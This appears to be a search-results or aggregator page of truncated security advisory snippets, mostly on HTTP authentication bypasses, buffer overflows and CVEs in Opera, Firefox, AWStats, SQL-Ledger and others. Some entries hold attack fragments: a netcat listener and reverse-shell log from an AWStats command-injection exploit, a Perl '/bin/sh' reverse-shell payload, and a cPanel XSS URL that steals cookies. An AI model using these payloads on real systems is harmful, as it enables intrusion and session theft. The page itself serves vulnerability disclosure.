Opera's HTTP authentication cuts off long server names at the end

Opera's HTTP authentication dialog is displayed when the user enters a Web pagethat requires a login name and a password. To inform the user which server itwas that asked for login credentials, the dialog displays the server name.The user has to see the entire server name. A truncated name can be...

opera -- multiple vulnerabilities

Opera Software ASA reports of multiple security fixes in Opera, including an arbitrary code execute vulnerability: Opera for Linux, FreeBSD, and Solaris has a flaw in the createPattern function that leaves old data that was in the memory before Opera allocated it in the new pattern. The pattern c...

Novell Groupwise WebAccess buffer overflow

Stack buffer overflow stack overrun during TCP/7205 TCP/7211 HTTP basic authentication on base64 decoding...

FreeBSD : sql-ledger -- security bypass vulnerability (8e02441d-d39c-11db-a6da-0003476f14d3)

Chris Travers reports : George Theall of Tenable Security notified the LedgerSMB core team today of an authentication bypass vulnerability allowing full access to the administrator interface of LedgerSMB 1.1 and SQL-Ledger 2.x. The problem is caused by the password checking routine failing to...

Security bypass vulnerability in LedgerSMB and SQL-Ledger (fixes released today)

Hi all; George Theall of Tenable Security notified the LedgerSMB core team today of an authentication bypass vulnerability allowing full access to the administrator interface of LedgerSMB 1.1 and SQL-Ledger 2.x. The problem is caused by the password checking routine failing to enforce a password...

sql-ledger -- security bypass vulnerability

Chris Travers reports: George Theall of Tenable Security notified the LedgerSMB core team today of an authentication bypass vulnerability allowing full access to the administrator interface of LedgerSMB 1.1 and SQL-Ledger 2.x. The problem is caused by the password checking routine failing to...

Fuji Xerox Printing Systems (FXPS) Print Engine Crafted Request HTTP Authentication Bypass

The remote host appears to be a Fuji Xerox Printing Systems FXPS printer. According to its firmware version, the web server component of the FXPS device reportedly fails to authenticate HTTP requests, which could allow a remote attacker to gain administrative control of the affected printer and...

In the PHP implementation of the system to external command-and-vulnerability warning-the black bar safety net

PHP as a server side scripting language, like writing a simple, or a complex dynamic web page such a task, it is fully able to do the job. But the thing is not always the case, sometimes in order to achieve a certain function, it must be by means of theoperating systemof the external program, or...

bl4ck_awstats_migrate_cmd_inj.py.txt

!/usr/bin/env python http://secunia.com/advisories/19969/ by [email protected] May 5, 2006 - HAPPY CINCO DE MAYO HAPPY BIRTHDAY DAD private plz redsand@jinxy / $ nc -l -p 31337 -v listening on any 31337 ... connect to 65.99.197.147 from blacksecurity.org 65.99.197.147 53377 id uid=81apach...

AWStats <= 6.5 (migrate) Remote Shell Command Injection Exploit

Exploit for cgi platform in category web applications =============================================================== AWStats &CLIENT";openSTDOUT,"&CLIENT";openSTDERR,"&CLIENT";ifforkexec "/bin/sh"; exit0; ;''; class rbawstatsMigrate: url = '' user = '' password = '' auth = False chost =False...

[Full-disclosure] Re: cPanel Multiple Cross Site Scripting Vulnerability

One more to ur list http://localhost:2095/dowebmailforward.cgi?fwd=3Cscript3Ealert28document.cookie293B3C2Fscript3E&action=Add+Forwarder Sumit On 2/4/06, Hamish Stanaway [email protected] wrote: Hi there, Thank you for finding this vulnerability in a widely used software. I was wondering i...

DEBIAN-CVE-2005-3185

Stack-based buffer overflow in the ntlmoutput function in http-ntlm.c for 1 wget 1.10, 2 curl 7.13.2, and 3 libcurl 7.13.2, and other products that use libcurl, when NTLM authentication is enabled, allows remote servers to execute arbitrary code via a long NTLM username...

[SECURITY] [DSA 844-1] New mod-auth-shadow packages fix authentication bypass

-------------------------------------------------------------------------- Debian Security Advisory DSA 844-1 [email protected] http://www.debian.org/security/ Martin Schulze October 5th, 2005 http://www.debian.org/security/faq -...

DSA-844-1 mod-auth-shadow - programming error

Bulletin has no description...

Debian DSA-844-1 : mod-auth-shadow - programming error

A vulnerability in modauthshadow, an Apache module that lets users perform HTTP authentication against /etc/shadow, has been discovered. The module runs for all locations that use the 'require group' directive which would bypass access restrictions controlled by another authorisation mechanism,...

HTTP Plaintext Password Authentication

Binary data 3018.prm...

CVE-2005-1935

CVE-2005-1935 documents a heap-based buffer overflow in the BERDecBitString function of Microsoft's ASN.1 library (MSASN1.DLL). The overflow occurs when processing nested constructed bit strings, leading to a realloc of a non-null pointer and potential overwrite of freed memory, demonstrated via ...

CVE-2005-1935

Heap-based buffer overflow in the BERDecBitString function in Microsoft ASN.1 library MSASN1.DLL allows remote attackers to execute arbitrary code via nested constructed bit strings, which leads to a realloc of a non-null pointer and causes the function to overwrite previously freed memory, as...

CVE-2005-0584

Firefox before 1.0.1 and Mozilla before 1.7.6, when displaying the HTTP Authentication dialog, do not change the focus to the tab that generated the prompt, which could facilitate spoofing and phishing attacks...

CVE-2005-0584

Firefox before 1.0.1 and Mozilla before 1.7.6, when displaying the HTTP Authentication dialog, do not change the focus to the tab that generated the prompt, which could facilitate spoofing and phishing attacks...